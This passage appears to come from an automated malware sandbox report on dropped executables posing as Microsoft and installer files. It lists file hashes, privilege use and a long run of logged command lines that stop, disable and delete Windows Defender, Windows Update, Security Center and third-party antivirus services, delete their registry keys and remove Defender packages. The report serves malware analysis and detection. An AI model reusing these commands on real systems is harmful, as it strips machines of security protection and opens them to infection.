| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\B1079C10-7F64-4C74-8FBC-D4B3E7AFDF3A\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\A8869433-AABD-4A6B-9057-28080F600D5F\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\CB619811-B681-407B-8F85-7CB48683D048\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\E90A543E-89ED-4D12-B4B5-46AE93ECA01F\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\1114080B-0ACB-4CBF-A5F0-6926D5353D27\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\D5BCAA8F-95AB-4136-93CA-BF3BD734ABD1\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\95411DA1-83B1-40E8-8D4E-9E8B9CBE46A6\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8524.tmp\8533.tmp\8534.bat "C:\Program Files\installerX32.exe""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8523.tmp\8524.tmp\8534.bat "C:\Program Files\InstallerX64.exe""
C:\Windows\SysWOW64\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\PROGRA~1\INSTAL~2.EXE
"C:\PROGRA~1\INSTAL~2.EXE"
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\89D6.tmp\89D7.tmp\89D8.bat C:\PROGRA~1\INSTAL~2.EXE"
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismhost.exe {CBEFE7D5-AAD4-4690-B2B0-AF21129BA3E1}
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Windows\system32\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\sc.exe
sc delete sense
C:\Users\Admin\AppData\Local\Temp\95411DA1-83B1-40E8-8D4E-9E8B9CBE46A6\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\95411DA1-83B1-40E8-8D4E-9E8B9CBE46A6\dismhost.exe {A1544C08-9553-46F9-9A9D-12E39A1C3321}
C:\Windows\system32\sc.exe
sc stop nsWscSvc
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\sc.exe
sc config MBAMService start= disabled
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\system32\sc.exe
sc stop Bytefenceservice
C:\Windows\system32\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\system32\sc.exe
sc delete Bytefenceservice
C:\Windows\system32\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\D5BCAA8F-95AB-4136-93CA-BF3BD734ABD1\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\D5BCAA8F-95AB-4136-93CA-BF3BD734ABD1\dismhost.exe {815AD444-1366-4881-B12F-E14CD742E20B}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\CB619811-B681-407B-8F85-7CB48683D048\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\CB619811-B681-407B-8F85-7CB48683D048\dismhost.exe {DF90B283-EFA6-4166-BB4E-D43D4EA2D9DF}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\E90A543E-89ED-4D12-B4B5-46AE93ECA01F\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\E90A543E-89ED-4D12-B4B5-46AE93ECA01F\dismhost.exe {3543CB19-FEDE-478B-9C3C-166053DA79FB}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\1114080B-0ACB-4CBF-A5F0-6926D5353D27\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\1114080B-0ACB-4CBF-A5F0-6926D5353D27\dismhost.exe {E3A2CD6D-517B-47FD-B2BA-3896B12EFFF2}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\B1079C10-7F64-4C74-8FBC-D4B3E7AFDF3A\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B1079C10-7F64-4C74-8FBC-D4B3E7AFDF3A\dismhost.exe {FE8E9E8D-810A-460A-AC15-53FA323A2AE8}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\A8869433-AABD-4A6B-9057-28080F600D5F\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\A8869433-AABD-4A6B-9057-28080F600D5F\dismhost.exe {D5BEC425-AC5D-45A9-AEB4-44383F4F5F87}
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
Network
Files
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/1432-132-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/4288-135-0x0000000000000000-mapping.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/4288-137-0x0000000000400000-0x000000000043D000-memory.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/2168-139-0x0000000000000000-mapping.dmp
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
memory/1868-142-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/3456-145-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/3456-148-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2396-149-0x0000000000000000-mapping.dmp
memory/4952-150-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\8523.tmp\8524.tmp\8534.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
memory/4540-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\8524.tmp\8533.tmp\8534.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
memory/1276-154-0x0000000000000000-mapping.dmp
memory/3892-155-0x0000000000000000-mapping.dmp
memory/4196-156-0x0000000000000000-mapping.dmp
memory/4456-157-0x0000000000000000-mapping.dmp
memory/1872-158-0x0000000000000000-mapping.dmp
memory/2276-159-0x0000000000000000-mapping.dmp
memory/2248-160-0x0000000000000000-mapping.dmp
memory/3500-161-0x0000000000000000-mapping.dmp
memory/3008-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\getadmin.vbs
| MD5 | 190aaabd7463fb8aa646211d9ef96446 |
| SHA1 | c7a7a327a45c2367dca3df94f2f00f063ec42326 |
| SHA256 | 20c13146b8a67613aa89ad61e5ac2fdce3c8cbf3ec0b1d33bfdd1093537ce62f |
| SHA512 | 405ad763120a26aeaea1794e512fb7f4383434a837f54160ae3fac2d64bb6d19f5a7fc50b662d62d15719c4771ed999b8bcefb56d078a9c61a2ed2f2ea183021 |
memory/1292-164-0x0000000000000000-mapping.dmp
memory/3364-165-0x0000000000000000-mapping.dmp
memory/3292-166-0x0000000000000000-mapping.dmp
memory/1312-167-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
